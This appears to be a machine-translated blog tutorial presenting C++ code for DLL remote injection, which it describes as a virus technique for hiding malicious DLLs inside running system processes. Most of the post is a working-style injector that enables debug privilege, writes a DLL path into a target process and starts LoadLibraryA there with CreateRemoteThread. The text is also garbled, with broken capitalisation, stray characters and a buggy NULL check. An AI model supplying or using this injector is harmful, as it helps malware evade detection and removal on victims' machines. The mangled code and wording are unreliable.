C ++: detailed explanation of dll Remote Injection Technology

DLL Remote injection is a widely used Win32 virus technology. The virus body using this technology is usually located in a DLL. When the system starts, an EXE program will run the dll to some system paths (such as assumer.exe. In this way, it is difficult for a common process manager to find the virus, and even if it is found, it is difficult to clear it, because as long as the virus parasitic process does not stop running, the DLL will not be detached from the memory, and the user cannot delete the DLL file in the resource manager.

Well, let's not talk nonsense. The following code:

# Include <windows. h>
# Include <iostream. h>

Bool EnableDebugPriv ()
{
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;
��
If (! OpenProcessToken (GetCurrentProcess (),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, & hToken )){
Return false;
}

If (! LookupPrivilegeValue (NULL, SE_DEBUG_NAME, & sedebugnameValue )){
CloseHandle (hToken );
Return false;
}

Tkp. PrivilegeCount = 1;
Tkp. Privileges [0]. Luid = sedebugnameValue;
Tkp. Privileges [0]. Attributes = SE_PRIVILEGE_ENABLED;

If (! AdjustTokenPrivileges (hToken, FALSE, & tkp, sizeof (tkp), NULL, NULL )){
CloseHandle (hToken );
Return false;
}

Return true;
}

BOOL InitDll (const char * DllFullPath, const DWORD dwRemoteProcessId)
{
EnableDebugPriv ();

HANDLE hRemoteProcess;
��
// Open a remote thread
HRemoteProcess = OpenProcess (PROCESS_ALL_ACCESS, FALSE, dwRemoteProcessId );

Char * pszLibFileRemote;

// Use the VirtualAllocEx function to allocate the DLL file name space in the memory address space of the remote process.
PszLibFileRemote = (char *) VirtualAllocEx (hRemoteProcess, NULL, lstrlen (DllFullPath) + 1,
MEM_COMMIT, PAGE_READWRITE );

// Use the WriteProcessMemory function to write the DLL path name to the memory space of the remote process.
WriteProcessMemory (hRemoteProcess, pszLibFileRemote, (void *) DllFullPath,
Lstrlen (DllFullPath) + 1, NULL );

DWORD dwID;
LPVOID pFunc = LoadLibraryA;
HANDLE hRemoteThread = CreateRemoteThread (hRemoteProcess, NULL, 0,
(LPTHREAD_START_ROUTINE) pFunc, pszLibFileRemote, 0, & dwID );

If (hRemoteThread = NULL)
{
Cout <"injection thread failed !" <Endl;
Return 0;
}
CloseHandle (hRemoteProcess );
CloseHandle (hRemoteThread );

Return TRUE;
}

Int main ()
{
InitDll ("C: \ hook. dll", number); // The dll file you want to inject. The "Number" is the PID of the process you want to inject.
Return 0;
}

Author: Li Mu Space"